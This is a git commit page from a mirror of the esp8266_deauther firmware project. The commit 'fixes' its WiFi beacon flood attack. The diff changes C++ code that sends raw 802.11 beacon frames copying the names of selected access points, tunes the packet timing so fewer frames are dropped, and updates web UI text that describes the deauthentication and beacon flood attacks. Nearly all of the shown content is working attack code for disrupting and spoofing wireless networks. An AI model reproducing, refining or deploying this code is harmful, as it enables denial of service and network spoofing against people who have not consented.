eessppeelllloo/esp8266_deauther
1
0
Fork 0
mirror of https://github.com/SpacehuhnTech/esp8266_deauther.git synced 2025-12-23 15:10:06 +01:00
Code Issues Packages Projects Releases Wiki Activity

Fixed beacon attack

Browse Source 
works now, but unfornatly only in broadcast. An targeted beacon flood attack on a specific client  is mostly dropped (maybe because of the SDK?).
This commit is contained in:
Stefan Kremser
2017-02-24 18:24:44 +01:00
parent 725f0eb18c
commit b2907561c3
8 changed files with 40 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
esp8266_deauther/APScan.cpp
View File

@@ -103,7 +103,13 @@ String APScan::getResults(){
void APScan::select(int num){ void APScan::select(int num){
if(debug) Serial.println("seect "+(String)num+" - "+!selected[num]); if(debug) Serial.println("seect "+(String)num+" - "+!selected[num]);
selected[num] = !selected[num]; if(selected[num]){
selected[num] = false;
selectedSum--;
}else{
selected[num] = true;
selectedSum++;
}
} }
bool APScan::isSelected(int num){ bool APScan::isSelected(int num){

1
esp8266_deauther/APScan.h
View File

@@ -30,6 +30,7 @@ class APScan{
bool isSelected(int num); bool isSelected(int num);
int results = 0; int results = 0;
int selectedSum;
MacList aps; MacList aps;
private: private:
int channels[maxResults]; int channels[maxResults];

35
esp8266_deauther/Attack.cpp
View File

@@ -50,7 +50,7 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
for(int i=0;i<6;i++){ for(int i=0;i<6;i++){
//set target (client) //set target (client)
packet[4+i] = _client._get(i); //packet[4+i] = _client._get(i);
//set source (AP) //set source (AP)
packet[10+i] = packet[16+i] = _ap._get(i); packet[10+i] = packet[16+i] = _ap._get(i);
} }
@@ -83,16 +83,18 @@ void Attack::buildBeacon(Mac _ap, Mac _client, String _ssid, int _ch, bool encry
} }
bool Attack::send(){ bool Attack::send(){
delay(1); //less packets will be dropped
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){ if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
if(debug){ /*if(debug){
Serial.print(packetSize); Serial.print(packetSize);
Serial.print(" : "); Serial.print(" : ");
PrintHex8(packet, packetSize); PrintHex8(packet, packetSize);
Serial.println(""); Serial.println("");
} }*/
return false; return false;
}else return true; }else{
delay(1); //less packets are beeing dropped
return true;
}
} }
void Attack::run(){ void Attack::run(){
@@ -143,9 +145,12 @@ void Attack::run(){
if(debug) Serial.println(" done "); if(debug) Serial.println(" done ");
} }
/* =============== Beacon Attack =============== */
if(isRunning[1] && currentMillis-prevTime[1] >= 100){ if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack"); if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
//int a = apScan.getFirstTarget();
for(int a=0;a<apScan.results;a++){ for(int a=0;a<apScan.results;a++){
if(apScan.isSelected(a)){ if(apScan.isSelected(a)){
String _ssid = apScan.getAPName(a); String _ssid = apScan.getAPName(a);
@@ -158,23 +163,27 @@ void Attack::run(){
wifi_set_channel(_ch); wifi_set_channel(_ch);
int _selectedClients = 0; //int _selectedClients = 0;
for(int c=0;c<macListLen;c++){ for(int c=0;c<macListLen/apScan.selectedSum;c++){
String _apName = _ssid; String _apName = _ssid;
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP " if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
else if(c < _restSSIDLen*2){ else if(c < _restSSIDLen*2){
_apName = "."+_apName; _apName = " "+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. ".SAMPLEAP " for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. " SAMPLEAP "
}else if(c < _restSSIDLen*3){
_apName += ".";
for(int d=0;d<(_restSSIDLen-1)-c/3;d++) _apName += " ";//e.g. ".SAMPLEAP "
} else{ } else{
for(int d=0; d < _restSSIDLen-2; d++) _apName += " "; for(int d=0; d < _restSSIDLen-1; d++) _apName += " ";
_apName += (String)c;//e.g. "SAMPLEAP 78" _apName += (String)c;//e.g. "SAMPLEAP 78"
} }
//build a broadcast packet for this AP & SSID //build a broadcast packet for this AP & SSID
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none"); buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
/*
for(int b=0;b<clientScan.results;b++){ for(int b=0;b<clientScan.results;b++){
if(clientScan.getClientSelected(b)){ if(clientScan.getClientSelected(b)){
_selectedClients++; _selectedClients++;
@@ -184,16 +193,15 @@ void Attack::run(){
if(send()) packetsCounter[1]++; if(send()) packetsCounter[1]++;
} }
} }*/
//if no clients are selected send the broadcast packet //if no clients are selected send the broadcast packet
if(_selectedClients == 0) if(send()) packetsCounter[1]++; /*if(_selectedClients == 0)*/ if(send()) packetsCounter[1]++;
} }
} }
} }
prevTime[1] = millis();
stati[1] = (String)(packetsCounter[1]*10)+"pkts/s"; stati[1] = (String)(packetsCounter[1]*10)+"pkts/s";
packetsCounter[1] = 0; packetsCounter[1] = 0;
macListChangeCounter++; macListChangeCounter++;
@@ -202,6 +210,7 @@ void Attack::run(){
macListChangeCounter = 0; macListChangeCounter = 0;
} }
if(debug) Serial.println(" done "); if(debug) Serial.println(" done ");
prevTime[1] = millis();
} }
if(isRunning[2] && currentMillis-prevTime[2] >= 1000){ if(isRunning[2] && currentMillis-prevTime[2] >= 1000){

2
esp8266_deauther/Attack.h
View File

@@ -14,7 +14,6 @@ extern "C" {
#define attacksNum 2 #define attacksNum 2
#define macListLen 80 #define macListLen 80
#define macListInterval 5
extern void PrintHex8(uint8_t *data, uint8_t length); extern void PrintHex8(uint8_t *data, uint8_t length);
extern void getRandomVendorMac(uint8_t *buf); extern void getRandomVendorMac(uint8_t *buf);
@@ -48,6 +47,7 @@ class Attack
unsigned int packetsCounter[attacksNum]; unsigned int packetsCounter[attacksNum];
bool isRunning[attacksNum]; bool isRunning[attacksNum];
int packetRate = 10; int packetRate = 10;
int macListInterval = 4;
MacList beaconAdrs; MacList beaconAdrs;

4
esp8266_deauther/data.h
View File

File diff suppressed because one or more lines are too long

4
esp8266_deauther/esp8266_deauther.ino
View File

@@ -16,7 +16,7 @@ extern "C" {
const static char *ssid = "pwned"; const static char *ssid = "pwned";
const static char *password = "deauther"; //must have at least 8 characters const static char *password = "deauther"; //must have at least 8 characters
const bool debug = true; const bool debug = false;
ESP8266WebServer server(80); ESP8266WebServer server(80);
@@ -134,7 +134,7 @@ void startClientScan(){
if(server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) { if(server.hasArg("time") && apScan.getFirstTarget() > -1 && !clientScan.sniffing) {
server.send(200, "text/json", "true"); server.send(200, "text/json", "true");
clientScan.start(server.arg("time").toInt()); clientScan.start(server.arg("time").toInt());
attack.stop(0); attack.stopAll();
} else server.send ( 200, "text/json", "Error: no selected access point"); } else server.send ( 200, "text/json", "Error: no selected access point");
} }

9
htmlfiles/attack.html
View File

@@ -39,13 +39,12 @@
<br> <br>
<b>deauth [deauthentication attack]:</b><br> <b>deauth [deauthentication attack]:</b><br>
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s). Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br>
<b>Note: </b>
If no client is selected, the packets are sent as broadcast!
<br><br> <br><br>
<b>beacon [beacon flood attack]:</b><br> <b>beacon [beacon flood attack]:</b><br>
Sends beacon frames to the selected client(s) with the same SSID as the selected WiFi access point(s). Spams beacon frames with a similar SSID as the selected WiFi access point(s).
<br><br>
<b>Note:</b><br>
If no client is selected, the packets are sent as broadcast!
<br>
</p> </p>
</div> </div>

2
htmlfiles/functions.js
View File

@@ -1,4 +1,4 @@
function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 3000){ function getResponse(adr, callback, timeoutCallback = function(){alert("timeout error. Please reload the site");}, timeout = 5000){
var xmlhttp = new XMLHttpRequest(); var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange = function() { xmlhttp.onreadystatechange = function() {
if(xmlhttp.readyState == 4){ if(xmlhttp.readyState == 4){